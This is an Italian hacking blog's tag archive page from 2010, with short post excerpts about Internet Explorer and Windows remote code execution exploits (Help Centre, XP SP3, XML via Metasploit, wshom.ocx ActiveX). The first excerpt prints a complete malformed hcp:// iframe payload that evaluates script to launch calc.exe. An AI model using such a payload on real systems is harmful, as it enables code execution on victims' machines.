Categorie:


Translate:
Italiano flagInglese flagFrancese flagTedesco flagPortoghese flagSpagnolo flag

Tag: ‘ie’

[EXPLOIT]Windows Help Centre Remote code Excution

giugno 10th, 2010 by clshack

Un altro exploit per windows, che permette l’esecuzione di comandi sul pc della vittima.
Bisogna passare a linux :D

Ma vediamo come funziona questo exploit, chiamato:
Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

Questo exploit, sfruttando i file asx possiamo aprire il windows help con un url malformato e far aprire ad esempio la
calcolatrice :D

I file asx, sono:

An ASX file (Advanced Stream Redirector) is a special type of file which works closely with Windows Media ASF files.

L’url malformato in questione è composto cosi:
<iframe src="hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/script%3E">
(continua…)

Tags: , , , , , ,
Posted in Hacking, Software, Windows | 1 Comment »

[exploit]Windows XP SP3 IE 7,8 Remote CODE Execution

febbraio 27th, 2010 by clshack

Questo exploit, è uscito il 26 febbraio 2010 e permette ad un “attacker” di eseguire del codice sulla nostra macchina facendoci visitare una pagina web.


Questo exploit, funziona con internet explorer 7,8 ma solo se usato su windows XP.
Si, quindi se usiamo Vista o windows 7, non siamo vulnerabili (da questo exploit -.-’ ) .
(continua…)

Tags: , , ,
Posted in Hacking | No Comments »

IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT

febbraio 13th, 2010 by clshack

Mamma mia internet explorer è peggio di una puttana, sempre aperto…
Questo è l’ultimo exploit, che colpisce internet explorer nelle versioni <= 7 ed è stato provato ed constatato che funziona con successo con IE 7 su queste versioni di windows:

  • Windows XP SP1;
  • Windows XP SP2;
  • Windows XP SP3;
  • Windows Vista.

Ciò, non significa che con le altre versioni di windows non funzioni anzi…

Ma vediamo come sfruttare questa vulnerabilità con Metasploit :)
(continua…)

Tags: , , ,
Posted in GNU/Linux, Hacking, Software | 2 Comments »

Exploit wshom.ocx (Run) ActiveX Remote Code Execution per IE 6-7-8

febbraio 1st, 2010 by clshack

Questo exploit, che è uscito il 22 gennaio 2010 permette di eseguire codice sulla nostra macchina windows durante l’utilizzo di internet explorer.

null

Ad esempio, se noi utilizziamo internet explorer da un account amministratore, questo exploit potrà, ad esempio aggiungerci un altro account.
(continua…)

Tags: , , ,
Posted in Hacking, Software, Windows | No Comments »